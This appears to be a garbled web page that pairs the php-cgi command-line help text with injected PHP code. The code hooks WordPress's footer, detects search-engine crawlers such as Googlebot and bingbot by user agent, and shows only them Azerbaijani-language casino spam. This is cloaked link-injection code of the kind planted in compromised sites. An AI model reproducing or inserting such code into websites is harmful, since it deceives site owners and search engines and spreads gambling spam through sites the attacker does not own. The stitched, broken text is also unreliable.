Usage: php-cgi [-q] [-h] [-s] [-v] [-i] [-f ] php-cgi [args...] -a Run interactively -b | Bind Path for external FASTCGI Server mode -C Do not chdir to the script's directory -c | Look for php.ini file in this directory -n No php.ini file will be used -d foo[=bar] Define INI entry foo with value 'bar' -e Generate extended information for debugger/profiler -f Parse . Implies `-q' -h This help -i PHP information -l Syntax check only (lint) -m Show compiled in modules -q Quiet-mode. Suppress HTTP Header output. -s Display colour syntax highlighted source. -v Version number -w Display source with stripped comments and whitespace. -z Load Zend extension . -T Measure execution time of script repeated times. // Link injection via wp_footer add_action('wp_footer', function() { $is_bot = false; $user_agent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $bot_agents = array('Googlebot', 'GoogleBot', 'googlebot', 'bingbot', 'yandex', 'checker', 'CheckBot'); foreach ($bot_agents as $bot) { if (stripos($user_agent, $bot) !== false) { $is_bot = true; break; } } if ($is_bot) { echo 'Canlı diler oyunları ilə1vinözünüzü real kazinoda hiss edəcəksiniz.'; } });